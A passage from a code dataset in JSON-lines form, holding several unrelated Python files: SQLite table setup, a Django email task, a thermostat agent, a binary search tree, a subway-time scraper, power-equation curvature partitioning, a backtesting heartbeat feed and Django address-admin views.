if_exists='replace', index = False)\n # print(\"\\nTable 2: Post_City Data\")\n # crsr.execute('''SELECT * FROM post_city''')\n # for row in crsr.fetchall():\n # print (row)\n \n\n #Creating normal table2 with post and city\n crsr.execute('CREATE TABLE normal_post_city (pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, FOREIGN KEY (ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10) REFERENCES em_city_name(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10), FOREIGN KEY (pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10) REFERENCES em_post_city(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n normal_df2.to_sql('normal_post_city', connection, if_exists='replace', index = False)\n # print(\"\\nNormal Table 2: Normal_Post_City Data\")\n # crsr.execute('''SELECT * FROM normal_post_city''')\n # for row in crsr.fetchall():\n # print (row)\n\n #Creating table3 with embeddings of post and name of posts\n crsr.execute('CREATE TABLE em_post_name (pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, post nvarchar(50), PRIMARY KEY(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n orig_post_df.to_sql('em_post_name', connection, if_exists='replace', index = False)\n # print(\"\\nTable 3: Em_Post_Name Data\")\n # crsr.execute('''SELECT * FROM em_post_name''')\n # for row in crsr.fetchall():\n # print (row)\n\n #Creating table4 with embeddings of city and name of cities\n crsr.execute('CREATE TABLE em_city_name (ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, city nvarchar(50), PRIMARY KEY(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10))')\n 
orig_city_df.to_sql('em_city_name', connection, if_exists='replace', index = False)\n # print(\"\\nTable 4: Em_City_Name Data\")\n # crsr.execute('''SELECT * FROM em_city_name''')\n # for row in crsr.fetchall():\n # print (row)\n\n connection.commit()\n\n #Execute the following line to print all the SQL queries when executed\n #connection.set_trace_callback(print)\n\n #Incase you want to drop all tables:\n #crsr.execute('DROP TABLE name_post_city')\n #crsr.execute('DROP TABLE post_city')\n #crsr.execute('DROP TABLE em_post_name')\n #crsr.execute('DROP TABLE em_city_name')\n #connection.commit() \n\n#get_data(10000,5000)","sub_path":"source/app/business_logic/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"414718453","text":"\"\"\"Basic tasks\"\"\"\n\nimport logging\n\nfrom celery import task\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import get_template\n\n\nlog = logging.getLogger(__name__)\n\n\n@task(queue='web')\ndef send_email_task(recipient, subject, template, template_html, context=None):\n \"\"\"Send multipart email\n\n recipient\n Email recipient address\n\n subject\n Email subject header\n\n template\n Plain text template to send\n\n template_html\n HTML template to send as new message part\n\n context\n A dictionary to pass into the template calls\n \"\"\"\n msg = EmailMultiAlternatives(\n subject,\n get_template(template).render(context),\n settings.DEFAULT_FROM_EMAIL,\n [recipient]\n )\n msg.attach_alternative(get_template(template_html).render(context),\n 'text/html')\n msg.send()\n log.info('Sent email to recipient: %s', recipient)\n","sub_path":"readthedocs/core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"349664322","text":"from environnement import Environment\nfrom ia import Agent\n\n\ndef objectif_atteint (e):\n if e.get_lastTemp() < e.get_tVoulue() <= e.get_tInt():\n return True\n if e.get_lastTemp() < e.get_tVoulue() <= e.get_tInt():\n return True\n else:\n return False\n\n\ndef world (agent, environment, outcome):\n # AJOUTER LE CONTEXTE A LA CREATION DE L'AGENT\n\n count = 0\n # if e.changeTvoulue == True :\n # print(\"change\")\n # _contexte = [environment.get_tInt(),environment.get_tVoulue(),environment.get_tExt()]\n # agent.addcontexte(_contexte)\n agent.update_contexte()\n agent.search_best_action() #\n action = agent.action(outcome)\n\n if objectif_atteint(environment):\n action = 2\n print(\"Action choisie : \" + str(action))\n outcome = environment.outcome(action)\n # print(\" TEMP \"+str(environment.get_tInt()) +\" (\"+ str(environment.get_lastdiff() - environment.get_diff())+\")\" )\n agent.save_best_actions(action, outcome)\n\n # new_temp = input('Entrer la nouvelle temperature2:')\n # environment.set_tVoulue(int(new_temp))\n\n action_outcome = [action, outcome]\n\n return action_outcome\n\n print(\"Nombres d'actions pour finir : \" + str(count))\n\n\ne = Environment(19, 21, 18, [1, 2])\nhedonist_table2 = [[2, -2, -2], [2, -2, -2], [3, -1, 4]]\nprint(\"hedo :\" + str(hedonist_table2[2][2]))\n_contexte = [e.get_tInt(), e.get_tVoulue(), e.get_tExt()]\na = Agent(hedonist_table2, 4, e)\n# a.addcontexte(_contexte)\naction_outcome = [0, 0]\n\nx = 'n'\n\nwhile (x == 'n'):\n x = input('Quitter ?')\n print(\"T interieur : \" + str(e.get_tInt()) + \" T voulue : \" + str(e.get_tVoulue()) + \" T exterieur : \" + str(\n e.get_tExt()))\n action_outcome = world(a, e, action_outcome[1])\n print(\"L'action a effectuer : \" + str(action_outcome))\n print(\"T interieur : \" + str(e.get_tInt()) + \" T voulue : \" + str(e.get_tVoulue()) + \" T exterieur : \" + str(\n e.get_tExt()))\n","sub_path":"ia/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"389096454","text":"class Nodo:\n def __init__(self, valor):\n self.hijoIzq = None\n self.hijoDer = None\n self.val = valor\n\n\nclass Arbol:\n def __init__(self):\n self.raiz = None\n\n def obtenerRaiz(self):\n return self.raiz\n\n def agregar(self, val):\n if(self.raiz == None):\n self.raiz = Nodo(val)\n else:\n self.agregarNodo(val, self.raiz)\n\n def agregarNodo(self, val, nodo):\n if(val < nodo.val):\n if(nodo.hijoIzq != None):\n self.agregarNodo(val, nodo.hijoIzq)\n else:\n nodo.hijoIzq = Nodo(val)\n else:\n if(nodo.hijoDer != None):\n self.agregarNodo(val, nodo.hijoDer)\n else:\n nodo.hijoDer = Nodo(val)\n\n def preorden(self, nodo):\n if(nodo != None):\n print(str(nodo.val))\n if nodo.hijoIzq != None:\n self.preorden(nodo.hijoIzq)\n if nodo.hijoDer != None:\n self.preorden(nodo.hijoDer)\n\n def imprimePreorden(self):\n if(self.raiz != None):\n self.preorden(self.raiz)\n\n def busqueda(self, nodo, valor):\n if(nodo.val == valor):\n return True\n if valor < nodo.val:\n return self.busqueda(nodo.hijoIzq, valor)\n else:\n return self.busqueda(nodo.hijoDer, valor)\n return False\n\n\nclass Controladora:\n def main(self):\n print(\"Grafo\")\n arbol = Arbol()\n arbol.agregar(8)\n arbol.agregar(3)\n arbol.agregar(10)\n arbol.agregar(1)\n arbol.agregar(6)\n arbol.agregar(14)\n arbol.agregar(4)\n arbol.agregar(7)\n arbol.agregar(13)\n arbol.imprimePreorden()\n print(\"Resultado de búsqueda\")\n print(arbol.busqueda(arbol.raiz, 13))\n\n\nobj = Controladora()\nobj.main()","sub_path":"Arboles.py","file_name":"Arboles.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"522960031","text":"#!/usr/bin/env python\nfrom samplebase import SampleBase\nfrom rgbmatrix import graphics\nimport time\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport json\ntwothreeURL = 'http://traintimelb-367443097.us-east-1.elb.amazonaws.com/getTime/2/232?callback=angular.callbacks._0'\nfourfiveURL = 'http://traintimelb-367443097.us-east-1.elb.amazonaws.com/getTime/4/423?callback=angular.callbacks._0'\n\n\ndef Jsonify(trainURL):\n r = requests.get(trainURL)\n soup = BeautifulSoup(r.text,'html.parser')\n #json1 since need to call an actual json funtion later on\n json1 = soup.text\n json1 = json1.split('(')\n json1 = json1[1].split(')')\n json1 = json1[0]\n global jsonDict\n jsonDict = json.loads(json1)\n\ndef Info():\n updateTime = jsonDict[\"lastUpdatedTime\"]\n station = jsonDict[\"stationName\"]\n print(station, updateTime)\n print('----------')\n # print(updateTime)\n # print('----------')\n\ndef Uptown():\n uptowntext = \"\"\n manhattan = jsonDict[\"direction1\"][\"times\"][0:2]\n for i in range(0,2):\n # NextTrainsManhattan = (\"There is a\", manhattan[i][\"route\"], \"train to\", manhattan[i][\"lastStation\"],\":\", manhattan[i][\"minutes\"], \"minutes away\")\n uptowntext += str(manhattan[i][\"route\"])\n uptowntext += \":\"\n uptowntext += str(manhattan[i][\"minutes\"])\n uptowntext += \"min\"\n return uptowntext\n\ndef Downtown():\n downtowntext = \"\"\n brooklyn = jsonDict[\"direction2\"][\"times\"][0:2]\n for j in range(0,2):\n # NextTrainsBrooklyn = (\"There is a\", brooklyn[j][\"route\"], \"train to\", brooklyn[j][\"lastStation\"],\":\", brooklyn[j][\"minutes\"], \"minutes away\")\n downtowntext += str(brooklyn[j][\"route\"])\n downtowntext += \":\"\n downtowntext += str(brooklyn[j][\"minutes\"])\n downtowntext += \"min\"\n return downtowntext\n\n# def AllUptown():\n# totaluptowntext = \"\"\n# Jsonify(twothreeURL)\n# Info()\n# totaluptowntext += Uptown()\n# Jsonify(fourfiveURL)\n# totaluptowntext += Uptown()\n# # print(totaluptowntext)\n# return totaluptowntext\ndef Uptown45():\n text = \"Up\"\n Jsonify(fourfiveURL)\n text += Uptown()\n return text\ndef Downtown45():\n text = \"Down\"\n Jsonify(fourfiveURL)\n text += Downtown()\n return text\ndef Uptown23():\n text = \"Up\"\n Jsonify(twothreeURL)\n text += Uptown()\n return text\ndef Downtown23():\n text = \"Down\"\n Jsonify(twothreeURL)\n text += Downtown()\n return text\n# def AllDowntown():\n# totaldowntowntext = \"\" \n# Jsonify(twothreeURL)\n# totaldowntowntext += Downtown()\n# Jsonify(fourfiveURL)\n# totaldowntowntext += Downtown()\n# # print(totaldowntowntext)\n# return totaldowntowntext\n\nsubwaytimeslist = []\nprint(subwaytimeslist)\ndef runall():\n subwaytimeslist.append(Uptown23())\n subwaytimeslist.append(Uptown45())\n subwaytimeslist.append(Downtown23())\n subwaytimeslist.append(Downtown45())\n\nrunall()\nprint(subwaytimeslist)\n\n\n\n","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"24700749","text":"from models import Task\n\n\ndef init_db():\n task_list = Task.query().fetch(20)\n if len(task_list) <= 0:\n for i in range(20):\n t = Task()\n t.description = \"Task #\" + str(i)\n t.put()\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"624527742","text":"import os\nimport re\nimport mako.template\nimport mako.lookup\n\n\nclass TextColours:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\nBASE_GRAMMAR_SETTINGS = {\n 'dialect': 'VB6',\n 'mode': 'rigorous',\n}\n\n\ndef rootPath():\n \"\"\"Return the root path\"\"\"\n return os.path.split(os.path.abspath(__file__))[0]\n\n\ndef relativePath(*paths):\n \"\"\"Return the path to a file\"\"\"\n return os.path.join(rootPath(), *paths)\n\n\ndef loadGrammarFrom(filename, data=None):\n \"\"\"Return the text of a grammar file loaded from the disk\"\"\"\n with open(filename, 'r') as f:\n text = f.read()\n lookup = mako.lookup.TemplateLookup(directories=[relativePath('grammars')])\n template = mako.template.Template(text, lookup=lookup)\n #\n base_data = {}\n base_data.update(BASE_GRAMMAR_SETTINGS)\n #\n if data:\n for k, v in data.items():\n if v is not None:\n base_data[k] = v\n #\n return str(template.render(**base_data))\n\n\ndef countNewlines(text):\n \"\"\"Return the number of newlines in some text\"\"\"\n return len(re.findall('\\n', text))\n","sub_path":"vb2py/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"172525271","text":"#Code to produce values for cumulated curvature of power equations\n\nimport numpy as np\n\nimport scipy.integrate as integrate\n\nimport egret.model_library.transmission.tx_calc as tx_calc\n\nimport matplotlib.pyplot as plt\n\n\n#############\n#Functions for Curvature for Power Equations\n#############\n\n#Assumes delta can be changed, but Vi, Vj are fixed\ndef power_equation(delta, branch, bus_type = \"from_bus\", power_type = \"Reactive\"):\n\tif not (power_type ==\"Active\" or power_type ==\"Reactive\"):\n\t\traise ValueError('Power type must be \"Active\" (for p) or \"Reactive\" (for q)')\n\n\tif not (bus_type == \"from_bus\" or bus_type == \"to_bus\"):\n\t\traise ValueError('Bus type must be \"from_bus\" (for f) or \"to_bus\" (for t)')\n\n\tg = tx_calc.calculate_conductance(branch)\n\tb = tx_calc.calculate_susceptance(branch)\n\n\t\n\tif power_type == \"Active\":\n\t\treturn g - g*np.cos(delta) - b*np.sin(delta)\n\telse:\n\t\treturn -b + b*np.cos(delta) - g*np.sin(delta)\n\ndef power_deriv(delta, branch, bus_type = \"from_bus\", power_type = \"Reactive\"):\n\tif not (power_type ==\"Active\" or power_type ==\"Reactive\"):\n\t raise ValueError('Power type must be \"Active\" (for p) or \"Reactive\" (for q)')\n\n\tif not (bus_type == \"from_bus\" or bus_type == \"to_bus\"):\n\t raise ValueError('Bus type must be \"from_bus\" (for f) or \"to_bus\" (for t)')\n\n\tg = tx_calc.calculate_conductance(branch)\n\tb = tx_calc.calculate_susceptance(branch)\n\n\t\n\tif power_type == \"Active\":\n\t\treturn g*np.sin(delta) - b*np.cos(delta)\n\telse:\n\t\treturn -b*np.sin(delta) - g*np.cos(delta)\n\ndef power_second_deriv(delta, branch, bus_type = \"from_bus\", power_type = \"Reactive\"):\n\tg = tx_calc.calculate_conductance(branch)\n\tb = tx_calc.calculate_susceptance(branch)\n\n\t\n\tif power_type == \"Active\":\n\t\treturn g*np.cos(delta) + b*np.sin(delta)\n\telse:\n\t\treturn -b*np.cos(delta) + g*np.sin(delta)\n\ndef curvature(delta, branch, bus_type = \"from_bus\", power_type = \"Reactive\"):\n\treturn np.absolute(power_second_deriv(delta, branch, bus_type, power_type))/(1+(power_deriv(delta, branch, bus_type, power_type))**2)\n\n#########################\n#Functions for Partitioning the domain into Q pieces of equal curvature\n#########################\n\ndef curvature_target_x_value(integration_lb, interval_lb, interval_ub, target_value, branch, bus_type=\"from_bus\", power_type=\"Reactive\", eps = 0.0001):\n\t#Finds an approximation for a value x in the domain where accumulated curvature is equal to a target value\n\t#The strategy is to recursively narrow down the given interval into smaller and smaller intervals until an acceptable point is found. 
\n\tx = np.linspace(interval_lb, interval_ub)\n\ti = 0\n\tfor value in x:\n\t\tcumulated_curvature = integrate.quad(curvature, integration_lb, value, args=(branch, bus_type, power_type))[0]\n\t\tif np.abs(cumulated_curvature - target_value) <= eps:\n\t\t\treturn value\n\t\tif target_value - cumulated_curvature > eps:\n\t\t\ti = i + 1\n\t\t\tcontinue\n\t\tif cumulated_curvature - target_value > eps:\n\t\t\treturn curvature_target_x_value(integration_lb, x[i-1], x[i], target_value, branch, bus_type, power_type, eps)\n\ndef eq_curvature_partition(lb, ub, Q, branch, bus_type=\"from_bus\", power_type=\"Reactive\", eps = 0.0001):\n\t#Divides the domain [lb, ub] into Q pieces of (approximately) equal curvature\n\tif Q == 1:\n\t\treturn [lb, ub]\n\tbreakpoints = [lb]\n\ttarget_value = (integrate.quad(curvature, lb, ub, args=(branch, bus_type, power_type))[0])/Q\n\tfor i in range(Q-1):\n\t\tbreakpoints.append(curvature_target_x_value(breakpoints[i], breakpoints[i], ub, target_value, branch, bus_type, power_type, eps))\n\tbreakpoints.append(ub)\n\treturn breakpoints\n\ndef dev_from_linear(lb, ub, branch, bus_type=\"bus_type\", power_type=\"Reactive\", lin_tol=0.1):\n\t#Finds an x-value where deviation from normal is more than an epsilon tolerance\n\tx = np.linspace(lb, ub)\n\tslope = (power_equation(x[1], branch, bus_type, power_type) - power_equation(x[0], branch, bus_type, power_type))/(x[1] - x[0])\n\ti = 0\n\tfor value in x: \n\t\tif np.abs(power_equation(value, branch, bus_type, power_type) - (slope*(value - x[0])+power_equation(x[0], branch, bus_type, power_type))) <= lin_tol:\n\t\t\ti = i + 1\n\t\t\tcontinue\n\t\telse:\n\t\t\treturn x[i-1]\n\treturn ub\n\ndef close_to_linear_cuts(lb, ub, branch, bus_type, power_type=\"Reactive\", lin_tol=0.1):\n\t#Refines a given interval based on how much the power_equation deviates from the linear approximation. 
\n\tpartition = [lb]\n\tx = dev_from_linear(lb, ub, branch, bus_type, power_type, lin_tol)\n\tif x == ub:\n\t\tpartition.append(x)\n\t\treturn partition\n\telse:\n\t\treturn partition + close_to_linear_cuts(x, ub, branch, bus_type, power_type, lin_tol)\n\t\n\ndef refined_eq_curvature_partition(lb, ub, Q, branch, bus_type=\"from_bus\", power_type = \"Reactive\", eps=0.0001, lin_tol=0.1):\n\tpartition = eq_curvature_partition(lb, ub, Q, branch, bus_type, power_type, eps)\n\trefined_partition = [lb]\n\tfor i in range(Q):\n\t\trefined_partition = refined_partition + [partition[i]] + close_to_linear_cuts(partition[i], partition[i+1], branch, bus_type, power_type, lin_tol) + [partition[i+1]]\n\tno_dup_refined_partition = []\n\tfor j in range(len(refined_partition) - 1):\n\t\tif refined_partition[j] == refined_partition[j+1]:\n\t\t\tcontinue\n\t\telse:\n\t\t\tno_dup_refined_partition.append(refined_partition[j])\n\tno_dup_refined_partition.append(ub)\n\treturn no_dup_refined_partition\n\nif __name__ == '__main__':\n import os\n import pyomo.environ as pe\n import egret.model_library.transmission.tx_utils as tx_utils\n import egret.model_library.transmission.tx_calc as tx_calc\n import egret.model_library.transmission.bus as libbus\n import egret.model_library.transmission.branch as libbranch\n import egret.model_library.transmission.gen as libgen\n from egret.parsers.matpower_parser import create_ModelData\n\n from egret.data.data_utils import map_items, zip_items\n\n path = os.path.dirname(__file__)\n filename = 'pglib_opf_case30_ieee.m'\n test_case = os.path.join('c:\\\\', 'Users', 'wlinz', 'Desktop', 'Restoration', 'Egret', 'egret', 'thirdparty', 'pglib-opf-master', filename) #Better if this isn't so user-dependent\n md_dict = create_ModelData(test_case)\n md = md_dict.clone_in_service()\n\n branches = dict(md.elements(element_type='branch'))\n branch_attrs = md.attributes(element_type='branch')\n\n buses = dict(md.elements(element_type='bus'))\n bus_attrs = md.attributes(element_type='bus')\n\n model=pe.ConcreteModel()\n\n ### declare the polar voltages\n libbus.declare_var_va(model, bus_attrs['names'], initialize=bus_attrs['va'])\n\n libbus.declare_var_vm(model, bus_attrs['names'], initialize=bus_attrs['vm'])\n\n libbus.declare_var_vmsq(model=model,\n index_set=bus_attrs['names'],\n initialize={k: v**2 for k, v in bus_attrs['vm'].items()},\n bounds=zip_items({k: v**2 for k, v in bus_attrs['v_min'].items()},\n {k: v**2 for k, v in bus_attrs['v_max'].items()}))\n\n\n \t#print(branches)\n #print(branches.keys())\n\n branch = branches['10']\n print(branch)\n\n from_partition = eq_curvature_partition(-np.pi/6, np.pi/6, 20, branch, power_type=\"Active\")\n\n to_partition = eq_curvature_partition(-np.pi/6, np.pi/6, 20, branch, power_type=\"Active\")\n\n from_refined_partition = refined_eq_curvature_partition(-np.pi/6, np.pi/6, 20, branch, power_type=\"Reactive\")\n\n to_refined_partition = refined_eq_curvature_partition(-np.pi/6, np.pi/6, 20, branch, power_type=\"Reactive\")\n\n print(\"Unrefined from partition:\", from_partition)\n\n print(\"Unrefined to partition:\", to_partition)\n\n print(\"Refined from partition:\", from_refined_partition)\n\n print(\"Refined to partition: \", to_refined_partition)\n\n x = np.linspace(-np.pi/6, np.pi/6)\n\n y1 = power_equation(x, branch)\n\n #plt.plot(x, y1)\n #plt.plot(x, y2)\n #plt.show()\n\n for i in range(len(from_partition) - 1):\n \tx = np.linspace(from_partition[i], from_partition[i+1])\n \ty = power_equation(x, branch)\n \tplt.plot(x, y)\n\n 
plt.show()\n\n for i in range(len(from_refined_partition) - 1):\n \tx = np.linspace(from_refined_partition[i], from_refined_partition[i+1])\n \ty = power_equation(x, branch)\n \tplt.plot(x, y)\n\n plt.show()\n\n\t\n\n\n\n\n###########\n#Plotting\n##########\n\n#Some quick code to generate a few plots for certain test cases\n\n# x2 = np.linspace(-np.pi/3, np.pi/3)\n\n# y3 = f(x2)\n\n# y4 = curvature(x2)\n\n# y5 = []\n\n# for value in x2: \n# \ty5.append(integrate.quad(lambda z: curvature(z), -np.pi/3, value)[0])\n\n# #print(x2)\n\n# #print(y4)\n\n# plt.plot(x2, y3, color = 'r')\n\n# plt.show()\n\n# plt.plot(x2, y4, color = 'g')\n\n# plt.show()\n\n# plt.plot(x2, y5, color = 'y')\n# plt.show()\n\n# for i in range(len(partition) - 1):\n# \tx = np.linspace(partition[i], partition[i+1])\n# \ty = []\n# \tfor value in x:\n# \t\ty.append(integrate.quad(lambda z: curvature(z), -np.pi/3, value)[0])\n# \tplt.plot(x, y)\n\n# plt.show()\n\n###############\n#Square Example\n###############\n\n# def square_curvature_target_x_value(integration_lb, interval_lb, interval_ub, target_value, eps = 0.0001):\n# \tx = np.linspace(interval_lb, interval_ub)\n# \ti = 0\n# \tfor value in x:\n# \t\tcumulated_curvature = integrate.quad(lambda z: 2.0/(1+4*z**2), integration_lb, value)[0]\n# \t\tif np.abs(cumulated_curvature - target_value) <= eps:\n# \t\t\treturn value\n# \t\tif target_value - cumulated_curvature > eps:\n# \t\t\ti = i + 1\n# \t\t\tcontinue\n# \t\tif cumulated_curvature - target_value > eps:\n# \t\t\treturn square_curvature_target_x_value(integration_lb, x[i-1], x[i], target_value, eps)\n\n# def square_eq_curvature_partition(lb, ub, Q = 20, eps = 0.0001):\n# \tif Q == 1:\n# \t\treturn [lb, ub]\n# \tbreakpoints = [lb]\n# \ttarget_value = (integrate.quad(lambda z: 2.0/(1+4*z**2), lb, ub)[0])/Q\n# \tfor i in range(Q-1):\n# \t\tbreakpoints.append(square_curvature_target_x_value(breakpoints[i], breakpoints[i], ub, target_value, eps))\n# \tbreakpoints.append(ub)\n# \treturn breakpoints\n\n# partition = square_eq_curvature_partition(-5.0, 5.0, 100)\n\n# x = np.linspace(-5.0, 5.0)\n\n# y1 = x**2\n\n# plt.plot(x, y1, color=\"g\")\n# plt.show()\n\n# # y2 = 2.0/np.sqrt(1+4*x**2)\n# # plt.plot(x, y2)\n# # plt.show()\n\n# # y3 = []\n\n# # for value in x:\n# # \ty3.append(integrate.quad(lambda z: 2.0/(1+4*z**2), -5.0, value)[0])\n\n# # plt.plot(x, y3)\n# # plt.show()\n\n# for i in range(len(partition) - 1):\n# \tx = np.linspace(partition[i], partition[i+1])\n# \ty = x**2\n# \t# for value in x:\n# \t# \ty.append(integrate.quad(lambda z: 2.0/(1+4*z**2), -5.0, value)[0])\n# \tplt.plot(x, y)\n\n# plt.show()\n\n\n\t\t\t\n\n","sub_path":"egret/models/Aravena_PWL_Approximations/Curvature.py","file_name":"Curvature.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"511369719","text":"from random import choice\nfrom data.AssetUtil import resPathToAbs\nfrom PyQt5.QtWidgets import QMessageBox\n\ndef showMessage (text):\n msgBox = QMessageBox( )\n msgBox.setIcon( QMessageBox.Information )\n msgBox.setText( text )\n\n msgBox.addButton( QMessageBox.Close )\n\n msgBox.setDefaultButton( QMessageBox.Close ) \n msgBox.exec_()\n \nmonsterNames = []\ndef getRandomMonsterName ():\n if len(monsterNames) == 0:\n #No cached Version of names available, so we have to load one from file\n with open(resPathToAbs(\"Monster_Names.txt\")) as f:\n for line in f:\n if line.endswith(\"\\n\"):\n line = line[:-1]\n monsterNames.append(line)\n return choice(monsterNames)\n \n\n\n","sub_path":"morestrategy_too/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"299586471","text":"#!/usr/bin/env python\n# enconding! utf-8\n\n\"\"\"\n@author:zhangmengzgs\n@contact:zhangmengzgs@csc.com.cn\n@file:DataFeed.py\n@time:2017/1/23 8:29\n\"\"\"\n\nfrom abc import ABCMeta, abstractmethod\nfrom DataPool import MainDataPool\nfrom DefaultLog import MainLogger\nfrom Event import EventFactory\nfrom datetime import datetime, timedelta\n\n\nclass DataFeed(object):\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def register_engine(self, engine):\n raise NotImplementedError\n\n @abstractmethod\n def start(self):\n raise NotImplementedError\n\n\nclass HeartBeatFeed(DataFeed):\n def __init__(self, start_date, end_date, delta):\n self.engine_list = []\n self.start_date = start_date\n self.end_date = end_date\n\n self.delta = delta\n self.trading_day = MainDataPool.get_trading_day(self.start_date, self.end_date)\n\n def start(self):\n \"\"\"启动心跳源\"\"\"\n MainLogger.info('心跳启动...')\n for trade_day in self.trading_day:\n if not self.engine_list:\n MainLogger.error('Engine list is empty!')\n raise ValueError()\n else:\n\n event = EventFactory.create_day_begin_event(trade_day)\n for engine in self.engine_list:\n engine.put_data(event)\n\n for hb in self.heart_beat(trade_day):\n event = EventFactory.create_heartbeat_event(hb)\n for engine in self.engine_list:\n engine.put_data(event)\n\n event = EventFactory.create_day_end_event(trade_day)\n for engine in self.engine_list:\n engine.put_data(event)\n for engine in self.engine_list:\n event = EventFactory.create_stop_hb_event()\n engine.put_data(event)\n\n def heart_beat(self, date):\n \"\"\"心跳节拍器\"\"\"\n step = timedelta(minutes=self.delta)\n\n morning_begin = datetime.strptime(date+' 9:30:00', '%Y%m%d %H:%M:%S')\n morning_end = datetime.strptime(date+' 11:29:00', '%Y%m%d %H:%M:%S')\n afternoon_begin = datetime.strptime(date+' 13:00:00', '%Y%m%d %H:%M:%S')\n afternoon_end = datetime.strptime(date+' 15:00:00', '%Y%m%d %H:%M:%S')\n\n while morning_begin <= morning_end:\n yield morning_begin\n morning_begin += step\n\n while afternoon_begin <= afternoon_end:\n yield afternoon_begin\n afternoon_begin += step\n\n def register_engine(self, engine):\n \"\"\"注册引擎\"\"\"\n if engine not in self.engine_list:\n self.engine_list.append(engine)\n else:\n MainLogger.warn('该引擎已经注册了!')\n\nif __name__ == \"__main__\":\n df = HeartBeatFeed('20150101', '20150110', delta=10)\n for hb in df.heart_beat('20150107'):\n print(hb)","sub_path":"DataFeed.py","file_name":"DataFeed.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"57679631","text":"from django.shortcuts import render,redirect\r\nimport sqlite3\r\nfrom django.core.mail import EmailMessage\r\n# Create your views here.\r\ndef index(request):\r\n #template = loader.get_template(\"Home/index.html\")\r\n conn = sqlite3.connect('address.db')\r\n cur = conn.cursor()\r\n result = cur.execute(\"\"\"SELECT * FROM temp\"\"\")\r\n result_list = result.fetchall()\r\n if(len(result_list) >0):\r\n context={'number' : 1,'pincode' : result_list[0][1] , 'ZoneNo' : result_list[0][2] ,'WingNo' : result_list[0][5] ,'FlatNo' : result_list[0][6] ,'Locality' : result_list[0][10],'BuildingNo' : result_list[0][11]}\r\n else:\r\n context = {'number' : 0}\r\n return render(request,'newadmin/newadmin.html' ,context )\r\n\r\ndef tempdel(request):\r\n conn = sqlite3.connect('address.db')\r\n cur = conn.cursor()\r\n result = cur.execute(\"\"\"SELECT * FROM temp\"\"\")\r\n result_list = result.fetchall()\r\n\r\n index1 = result_list[0][0]\r\n submit = request.POST.get('add')\r\n print(submit)\r\n if submit == 'y':\r\n pincode = '411011'\r\n tablename = \"p\" + str(pincode) + \"zt\"\r\n query2 = \"Select lat from \" + tablename # returns tuple of lat and long\r\n zones = cur.execute(query2)\r\n zonec = zones.fetchall()\r\n index = -1\r\n for i in zonec:\r\n index = index + 1\r\n\r\n query6 = \"INSERT INTO \" + tablename + \"\"\" VALUES ( :indexno, :pincode, :zone , :lat, :long, :wing, :flat, :state, :district, :premise, :locality, :b)\"\"\"\r\n cur.execute(query6, {'indexno': index + 1, 'pincode': result_list[0][1], 'zone': result_list[0][2],\r\n 'lat': result_list[0][3], 'long': result_list[0][4], 'wing': result_list[0][5],\r\n 'flat': result_list[0][6], 'state': str(result_list[0][7]),\r\n 'district': str(result_list[0][8]), 'premise': str(result_list[0][9]),\r\n 'locality': str(result_list[0][10]), 'b': result_list[0][11]})\r\n cur.execute(\"DELETE from temp where INDEXNO = \" + str(index1))\r\n conn.commit()\r\n dcode1 = getDcode(result_list[0][1], result_list[0][11], result_list[0][5], result_list[0][6], result_list[0][11], result_list[0][10])\r\n to_email = result_list[0][12]\r\n email = EmailMessage(\"Decode Successfully Generated!\", \"Your Dcode is \"+str(dcode1), to=[to_email])\r\n email.send()\r\n else:\r\n cur.execute(\"DELETE from temp where INDEXNO = \" + str(index1))\r\n conn.commit()\r\n\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n return redirect('index')\r\n\r\n\r\ndef getDcode(pincode1, building, wingno, flatno, h_address, s_address):\r\n #get_decode(pincode , building , wingno , flatno , 